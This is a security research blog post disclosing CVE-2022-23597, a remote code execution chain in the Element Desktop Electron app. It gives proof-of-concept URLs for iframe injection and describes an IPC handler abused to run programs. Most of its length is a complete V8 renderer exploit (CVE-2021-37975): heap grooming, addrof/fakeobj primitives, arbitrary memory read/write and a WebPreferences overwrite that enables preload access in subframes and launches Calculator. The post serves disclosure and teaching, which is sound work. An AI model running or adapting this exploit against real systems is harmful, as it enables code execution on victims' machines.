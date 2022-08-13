Logo
Overview

CVE-2022-23597: Remote code execution on Element Desktop

We achieved full RCE on Element Desktop by chaining iframe injection, Electron misconfigs, and a V8 exploit to bypass sandboxing and access Node.js APIs from a subframe.

Mohan Pedhapati,
TheGrandPew
10 min read
Note

Want to secure your Electron or JavaScript application? Reach out to us at hello@hacktron.ai or visit https://hacktron.ai to learn more.

Introduction

Discord screenshot

During our Electron Desktop Application hacking frenzy, Pew informed me on Discord about a Desktop Application called Element in which he was able to insert an external iframe. We began examining the Element source code, which is public here, and eventually succeeded in Remote Code Execution.

Let’s dig into the details of the bug right away!

Bug 1: iframe injection

This is a feature, rather than a bug. Element supports Jitsi for conference calls, which provides options for self-hosting your own server. According to its documentation, the conferenceDomain query parameter can be provided to embed a self-hosting conference server. Furthermore, the documentation also mentions that “The URL is typically something we shove into an iframe with ‘sandboxing’”. Since it was “sandboxed” it won’t be an issue right… right?

Here is the PoC for the web application. The following URL can be used to embed an external site named pwn.af:

https://app.element.io/jitsi.html?conferenceDomain=pwn.af&conferenceId=xxd&userId=pew

Here is the desktop application PoC:

element://vector/webapp/jitsi.html?conferenceDomain=pwn.af&conferenceId=xxd&userId=pew

By using the above PoC, we can get JavaScript execution on the desktop app. The issue, however, is that the Element Desktop application fully enables sandboxing. As you can notice in the below script, sandboxing is enabled via app.enableSandbox(). Also note that nodeIntegrationInSubFrames is disabled by default:

    app.enableSandbox();
    global.mainWindow = new BrowserWindow({
      [...]
        webPreferences: {
            preload: preloadScript,
            nodeIntegration: false,
            //sandbox: true, // We enable sandboxing from app.enableSandbox() above
            contextIsolation: true,
            webgl: true,
        },

This situation is different from the previous Discord bug where sandboxing was not fully enabled.

There are a few things we can look for if sandboxing is disabled on the main window:

  1. Check if there are any new-window or navigation misconfigurations similar to the Discord bug.
  2. Check if there are any postMessage issues on the main frame.
  3. Find an XSS on the subdomain of the parent window (app.element.io) to perform same-origin spoofing (similar to this challenge I gave in BSides Ahmedabad CTF).
  4. Finally, we can look for sensitive ipcMain handlers on the main window, which can be reached through CVE-2022-29247 (which we reported to Electron).

Now, the only option we have is option 4, as the app is fully sandboxed. To achieve RCE, we will need to utilize the following.

Bug 2: Finding RCE sinks on the desktop app

After grepping for ipcMain.on and ipcMain.handle, we came across an interesting IPC handler defined to open user-downloaded files, located here:

src/webcontents-handler.ts
ipcMain.on('userDownloadOpen', function(ev: IpcMainEvent, { path }) {
    shell.openPath(path);
});

And, this is exposed to the main window’s parent frame using the preload script’s contextBridge as below:

contextBridge.exposeInMainWorld(
    "electron",
    {
        on(channel: string, listener: (event: IpcRendererEvent, ...args: any[]) => void): void {
            if (!CHANNELS.includes(channel)) {
                console.error(`Unknown IPC channel ${channel} ignored`);
                return;
            }
            ipcRenderer.on(channel, listener);
        },
        send(channel: string, ...args: any[]): void {
            if (!CHANNELS.includes(channel)) {
                console.error(`Unknown IPC channel ${channel} ignored`);
                return;
            }
            ipcRenderer.send(channel, ...args);
        },
    },
);

So, by sending the following IPC from the main frame, we achieve RCE:

electron.send('userDownloadOpen', { path: 'C:\\Windows\\System32\\calc.exe' })

Now, let’s consider our options on how to get access to electron.send from the iframe which we have XSS on.

  1. Get an XSS on the main window and access electron.send directly.
  2. Use CVE-2022-29247’s nodeIntegrationInSubFrames and get access to electron.send in our iframe.

We audited the main window’s JavaScript for XSS sinks, but we couldn’t find anything interesting. So, we decided to use the second option, which seems to be easily achieved as the Element Desktop is using an old version of Electron (Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Element/1.9.5 Chrome/91.0.4472.164 Electron/13.5.1 Safari/537.36).

What is nodeIntegrationInSubFrames?

It is important to understand what nodeIntegrationSubFrames is clearly, from the official Electron Documentation the nodeIntegrationInSubFrames webPreference is defined as follows:

nodeIntegrationInSubFrames: Experimental option for enabling Node.js support in sub-frames such as iframes and child windows. All your preloads will load for every iframe, you can use process.isMainFrame to determine if you are in the main frame or not.

The important thing to note in the above statement for our exploit is that the nodeIntegrationSubFrames enables preloads in iframes, in other words it exposes contextBridge APIs to the iframes and child windows. Which is what we exactly wanted to get access to electron.send exposed by the Element Desktop Main window preload JS.

The situation we have can be described with the below picture:

Node Integration in Sub Frames

As you can see our frame doesn’t have access to electron.send API.

Bug 3: Renderer exploit to enable nodeIntegrationInSubFrames (CVE-2022-29247)

Electron adds Electron-specific WebPreferences such as node_integration, context_isolation and node_integration_in_subframes by patching the blink WebPreferences. These preferences are then later used to check if the specific RenderFrame (a web frame) has access to Electron specific features, such as Node APIs, preload scripts, contextBridge, etc.

--- a/third_party/blink/common/web_preferences/web_preferences.cc
+++ b/third_party/blink/common/web_preferences/web_preferences.cc
@@ -142,6 +142,19 @@ WebPreferences::WebPreferences()
       fake_no_alloc_direct_call_for_testing_enabled(false),
       v8_cache_options(blink::mojom::V8CacheOptions::kDefault),
       record_whole_document(false),
+      // Begin Electron-specific WebPreferences.
+      context_isolation(false),
+      is_webview(false),
+      hidden_page(false),
+      offscreen(false),
+      node_integration(false),
+      node_integration_in_worker(false),
+      node_integration_in_sub_frames(false),
+      enable_spellcheck(false),
+      enable_plugins(false),
+      enable_websql(false),
+      webview_tag(false),
+      // End Electron-specific WebPreferences.
       cookie_enabled(true),
       accelerated_video_decode_enabled(false),
       animation_policy(

Let’s just concentrate on node_integration_in_sub_frames, which is needed for our Element RCE. The other WebPreferences exploitations will be described in coming blog posts.

The decision to either allow preloads in child frames (RenderFrames) takes place in ElectronRenderFrameObserver:DidInstallConditionalFeatures, which is done in the same renderer process instead of the browser process:

void ElectronSandboxedRendererClient::DidCreateScriptContext(
    v8::Handle<v8::Context> context,
    content::RenderFrame* render_frame) {
  RendererClientBase::DidCreateScriptContext(context, render_frame);


  // Only allow preload for the main frame or
  // For devtools we still want to run the preload_bundle script
  // Or when nodeSupport is explicitly enabled in sub frames
  bool is_main_frame = render_frame->IsMainFrame();
  bool is_devtools =
      IsDevTools(render_frame) || IsDevToolsExtension(render_frame);
  bool allow_node_in_sub_frames =
      render_frame->GetBlinkPreferences().node_integration_in_sub_frames;
  bool should_load_preload =
      (is_main_frame || is_devtools || allow_node_in_sub_frames) &&
      !IsWebViewFrame(context, render_frame);
  if (!should_load_preload)
    return;


  injected_frames_.insert(render_frame);
  // ...
}

As the check is done in the renderer process, using a renderer exploit the setting can be flipped which effectively enables nodeIntegrationInSubFrames.

The only thing which is left is to write an exploit which flips the render_frame->GetBlinkPreferences().node_integration_in_sub_frames somehow, which is the hardest part for me.

Using a v8 exploit (CVE-2021-37975)

I decided to use CVE-2021-37975 to exploit the issue. Having not so much experience in exploit development, this was the most tiring yet most interesting part for me. Fun fact, I didn’t know nothing about v8 binary exploitation before our research, and somehow was able to learn basic v8 exploitation thanks to my CTF mate ptr-yudai 😌. Even though we usually use a public v8 exploit, it’s not as easy as running it and popping the calculator. The hardest part I faced during the exploit writing was finding the render_frame_ offset from the window object, as it was usually not stable because of naive usage of hardcoded offsets. I spent days in lldb to understand the v8 bug and find offsets to blink WebPreferences, but popping the calculator in the end made it worth doing.

Anywho, after trying for 2 days I was able to pull off a full exploit. The following snippet reveals the offset to render_frame->GetBlinkPreferences().node_integration_in_sub_frames. You can find the full exploit at the end of the writeup:

var win = addrof(window)
console.log('[+] win address : ' + win.hex())


var addr1 = half_read(win + 0x18n)
console.log('[+] win + 0x18 : ' + addr1.hex())


var addr2 = full_read(addr1 + 0xf8n)
console.log('[+] add2: ' + addr2.hex())


var web_pref = addr2 + 0x50008n
var preload = full_read(web_pref + 0x1a0n)
console.log('[+] web_pref addr: ' + web_pref.hex())


var nisf = web_pref + 0x1acn
var nisf_val = full_read(nisf)
console.log('[+] nisf val = ' + nisf_val.hex())
var overwrite = nisf_val | 0x0000000000000001n //overwrite
full_write(nisf, overwrite)
var nisf_val = full_read(nisf)
console.log('[+] nisf val overwritten = ' + nisf_val.hex())

And finally, after enabling nodeIntegrationInSubFrames, we just need to create a same-origin RenderFrame, which will have access to electron.send 🔥:

frame = document.createElement('iframe')
frame.srcdoc =
  "<script>electron.send('userDownloadOpen',{path:'/System/Applications/Calculator.app/Contents/MacOS/Calculator'})<\/script>"
document.body.appendChild(frame)

PoC

We can diagram the final exploit as follows:

final

Here is a video of the exploit in action:

Here is the full exploit:

<html>
  <head></head>
  <b>pwn</b>
  <button onclick="pwn()">click me to pwn</button>
  <script>
    function sleep(miliseconds) {
      var currentTime = new Date().getTime()
      while (currentTime + miliseconds >= new Date().getTime()) {}
    }


    var initKey = { init: 1 }
    var level = 4
    var map1 = new WeakMap()
    var gcSize = 0x4fe00000
    var sprayParam = 100


    var dbl = [1.1, 1.1, 1.1, 1.1]
    // %DebugPrint(dbl);


    //Get mapAddr using DebugPrint for double array (the compressed address of the map)
    // var mapAddr = 0x824a8e1;
    // var mapAddr = 0x82830e1
    var mapAddr = 0x83430e1


    var rwxOffset = 0x60


    var code = new Uint8Array([
      0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127,
      3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5,
      131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128,
      128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105,
      110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42,
      11,
    ])
    var module = new WebAssembly.Module(code)
    var instance = new WebAssembly.Instance(module)
    var wasmMain = instance.exports.main
    // %DebugPrint(instance);
    //Return values should be deleted/out of scope when gc happen, so they are not directly reachable in gc
    function hideWeakMap(map, level, initKey) {
      let prevMap = map
      let prevKey = initKey
      for (let i = 0; i < level; i++) {
        let thisMap = new WeakMap()
        prevMap.set(prevKey, thisMap)
        let thisKey = { h: i }
        //make thisKey reachable via prevKey
        thisMap.set(prevKey, thisKey)
        prevMap = thisMap
        prevKey = thisKey
        if (i == level - 1) {
          let retMap = new WeakMap()
          map.set(thisKey, retMap)
          return thisKey
        }
      }
    }
    //Get the key for the hidden map, the return key is reachable as strong ref via weak maps, but should not be directly reachable when gc happens
    function getHiddenKey(map, level, initKey) {
      let prevMap = map
      let prevKey = initKey
      for (let i = 0; i < level; i++) {
        let thisMap = prevMap.get(prevKey)
        let thisKey = thisMap.get(prevKey)
        prevMap = thisMap
        prevKey = thisKey
        if (i == level - 1) {
          return thisKey
        }
      }
    }


    function setUpWeakMap(map) {
      //  for (let i = 0; i < 1000; i++) new Array(300);
      //Create deep enough weak ref trees to hiddenMap so it doesn't get discovered by concurrent marking
      let hk = hideWeakMap(map, level, initKey)
      //Round 1 maps
      let hiddenMap = map.get(hk)
      let map7 = new WeakMap()
      let map8 = new WeakMap()


      //hk->k5, k5: discover->wl
      let k5 = { k5: 1 }
      let map5 = new WeakMap()
      let k7 = { k7: 1 }
      let k9 = { k9: 1 }
      let k8 = { k8: 1 }
      let ta = new Uint8Array(1024)
      ta.fill(0xfe)
      let larr = new Array(1 << 15)
      larr.fill(1.1)
      let v9 = { ta: ta, larr: larr }
      map.set(k7, map7)
      map.set(k9, v9)


      //map3 : kb|vb: initial discovery ->wl
      hiddenMap.set(k5, map5)
      hiddenMap.set(hk, k5)


      //iter2: wl: discover map5, mark v6 (->k5) black, discovery: k5 black -> wl
      //iter3: wl: map5 : mark map7, k7, no discovery, iter end
      map5.set(hk, k7)


      //Round 2: map5 becomes kb in current, initial state: k7, map7 (black), goes into wl
      //iter1


      //wl discovers map8, and mark k8 black
      map7.set(k8, map8)
      map7.set(k7, k8)


      //discovery moves k8, map8 into wl
      //iter2 marks k9 black, iter finished
      map8.set(k8, k9)
    }


    var conversion_buffer = new ArrayBuffer(8)
    var float_view = new Float64Array(conversion_buffer)
    var int_view = new BigUint64Array(conversion_buffer)
    BigInt.prototype.hex = function () {
      return '0x' + this.toString(16)
    }
    BigInt.prototype.i2f = function () {
      int_view[0] = this
      return float_view[0]
    }
    Number.prototype.f2i = function () {
      float_view[0] = this
      return int_view[0]
    }


    var view = new ArrayBuffer(24)
    var dblArr = new Float64Array(view)
    var intView = new Int32Array(view)
    var bigIntView = new BigInt64Array(view)


    function ftoi32(f) {
      dblArr[0] = f
      return [intView[0], intView[1]]
    }


    function i32tof(i1, i2) {
      intView[0] = i1
      intView[1] = i2
      return dblArr[0]
    }


    function itof(i) {
      bigIntView = BigInt(i)
      return dblArr[0]
    }


    function ftoi(f) {
      dblArr[0] = f
      return bigIntView[0]
    }


    BigInt.prototype.hex = function () {
      return '0x' + this.toString(16)
    }


    Number.prototype.hex = function () {
      return '0x' + this.toString(16)
    }


    function gc() {
      //trigger major GC: See https://tiszka.com/blog/CVE_2021_21225_exploit.html (Trick #2: Triggering Major GC without spraying the heap)
      new ArrayBuffer(gcSize)
    }


    function restart() {
      //Should deopt main if it gets optimized
      global.__proto__ = {}
      gc()
      sleep(2000)
      pwn()
    }


    function pwn() {
      setUpWeakMap(map1)
      gc()


      let objArr = []


      for (let i = 0; i < sprayParam; i++) {
        let thisArr = new Array(1 << 15)
        objArr.push(thisArr)
      }
      //These are there to stop main being optimized by JIT
      globalIdx['a' + globalIdx] = 1
      //Can't refactor this, looks like it cause some double rounding problem (got optimized?)
      for (let i = 0; i < objArr.length; i++) {
        let thisArr = objArr[i]
        thisArr.fill(instance)
      }
      globalIdx['a' + globalIdx + 1000] = 1
      let result = null
      try {
        result = fetch()
      } catch (e) {
        console.log('fetch failed')
        restart()
        return
      }
      if (!result) {
        console.log('fail to find object address.')
        restart()
        return
      }
      let larr = result.larr
      let index = result.idx


      let instanceAddr = ftoi32(larr[index])[0]
      let instanceFloatAddr = larr[index]
      console.log(
        'found instance address: 0x' +
          instanceAddr.toString(16) +
          ' at index: ' +
          index,
      )
      let x = {}
      for (let i = 0; i < objArr.length; i++) {
        let thisArr = objArr[i]
        thisArr.fill(x)
      }


      globalIdx['a' + globalIdx + 5000] = 1


      larr[index] = instanceFloatAddr
      let objArrIdx = -1
      let thisArrIdx = -1
      for (let i = 0; i < objArr.length; i++) {
        globalIdx['a' + globalIdx + 3000] = 1
        global.__proto__ = {}
        let thisArr = objArr[i]
        for (let j = 0; j < thisArr.length; j++) {
          let thisObj = thisArr[j]
          if (thisObj == instance) {
            console.log('found window object at: ' + i + ' index: ' + j)
            objArrIdx = i
            thisArrIdx = j
          }
        }
      }
      globalIdx['a' + globalIdx + 4000] = 1
      if (objArrIdx == -1) {
        console.log('failed getting fake object index.')
        restart()
        return
      }
      let obj_arr = objArr[objArrIdx]
      let double_arr = larr


      //%DebugPrint(objArr[objArrIdx][thisArrIdx]);


      function addrof(obj) {
        obj_arr.fill(obj)
        return (double_arr[index].f2i() & 0xffffffffn) - 1n
      }


      function fakeobj(addr) {
        globalIdx['a' + globalIdx + 2001] = 1


        larr[index] = addr
        return objArr[objArrIdx][thisArrIdx]
      }


      globalIdx['a' + globalIdx + 2000] = 1


      // Fake map
      let addr_proto = addrof(Array.prototype)
      console.log('[+] addr_proto = ' + addr_proto.hex())
      let fake_map = [
        0x1604040408042119n.i2f(),
        0x0a0004002100043dn.i2f(),
        (addr_proto | 1n).i2f(),
      ]


      //%DebugPrint(fake_map);
      let addr_map = addrof(fake_map) + 0x74n
      if (addr_map % 8n != 0) addr_map -= 4n //for some reason it should %8 = 0
      console.log('[+] fake map: ' + addr_map.hex())


      let obj = [1.1, 1.1, 1.1]
      //%DebugPrint(obj);


      let addr = Number(addrof(obj)) | 1


      let objEleAddr = addr + 0x18 + 0x8
      let floatAddr = i32tof(objEleAddr, objEleAddr)
      let floatMapAddr = i32tof(Number(addr_map) | 1, Number(addr_map) | 1)
      //Faking an array at using obj[0] and obj[1]
      obj[0] = floatMapAddr
      // let eleLength = i32tof(instanceAddr + rwxOffset, 10);
      //fake object at element of obj
      larr[index] = floatAddr
      let fakeArray = objArr[objArrIdx][thisArrIdx]


      function half_read(addr) {
        // let element = i32tof(addr-8, 10);//-8 exact addr
        let element = (0x888800000001n | (addr - 8n)).i2f()
        obj[1] = element
        return fakeArray[0].f2i()
      }
      function half_write(addr, value) {
        // let element  = i32tof(addr-8, 10);
        let element = (0x888800000001n | (addr - 8n)).i2f()
        obj[1] = element
        fakeArray[0] = value.i2f()
      }


      //full read write
      let evil = new Float64Array(0x10)
      let addr_evil = addrof(evil)
      console.log('[+] addr_evil = ' + addr_evil.hex())
      let orig_evil = half_read(addr_evil + 0x28n)
      console.log('[+] backing store of typed array: ' + orig_evil.hex())
      function full_read(addr) {
        half_write(addr_evil + 0x28n, addr)
        return evil[0].f2i()
      }
      function full_write(addr, value) {
        half_write(addr_evil + 0x28n, addr)
        evil[0] = value.i2f()
      }
      function full_cleanup() {
        half_write(addr_evil + 0x28n, orig_evil)
      }


      var win = addrof(window)
      console.log('[+] win address : ' + win.hex())


      var addr1 = half_read(win + 0x18n)
      console.log('[+] win + 0x18 : ' + addr1.hex())


      var addr2 = full_read(addr1 + 0xf8n)
      console.log('[+] add2: ' + addr2.hex())


      var web_pref = addr2 + 0x50008n
      var preload = full_read(web_pref + 0x1a0n)
      console.log('[+] web_pref addr: ' + web_pref.hex())


      console.log('[+] preload addr: ' + preload.hex())


      var ciso = web_pref + 0x184n
      var nisf = web_pref + 0x1acn
      var nisf_val = full_read(nisf)
      console.log('[+] nisf val = ' + nisf_val.hex())
      var overwrite = nisf_val | 0x0000000000000001n
      full_write(nisf, overwrite)
      var nisf_val = full_read(nisf)
      console.log('[+] nisf val overwritten = ' + nisf_val.hex())


      // var ciso_val = full_read(ciso);
      // console.log("[+] ciso val = "+ ciso_val.hex());
      // var overwrite = ciso_val  &  (0xffffffffffffff00n);
      // full_write(ciso, overwrite);
      // var nisf_val = full_read(ciso);
      // console.log("[+] ciso val overwritten = "+ ciso_val.hex());


      frame = document.createElement('iframe')
      frame.srcdoc =
        "<script>electron.send('userDownloadOpen',{path:'/System/Applications/Calculator.app/Contents/MacOS/Calculator'})<\/script>"
      document.body.appendChild(frame)
    }


    function findTA(ta) {
      let found = false
      for (let i = 0; i < 16; i++) {
        if (ta[i] != 0xfe) {
          console.log(ta[i])
          return true
        }
      }
      console.log(ta[0])
      return found
    }


    function findLArr(larr) {
      for (let i = 0; i < 1 << 15; i++) {
        if (larr[i] != 1.1) {
          let addr = ftoi32(larr[i])
          return i
        }
      }
      return -1
    }


    function fetch() {
      let hiddenKey = getHiddenKey(map1, level, initKey)
      let hiddenMap = map1.get(hiddenKey)
      let k7 = hiddenMap.get(hiddenMap.get(hiddenKey)).get(hiddenKey)
      let k8 = map1.get(k7).get(k7)
      let map8 = map1.get(k7).get(k8)


      let larr = map1.get(map8.get(k8)).larr
      let index = findLArr(larr)
      if (index == -1) {
        return
      }
      return { larr: larr, idx: index }
    }
    global = {}
    globalIdx = 0
    pwn()
  </script>
</html>

Hacktron finds and fixes real security vulnerabilities before they ship to production.

Start for freeBook a demo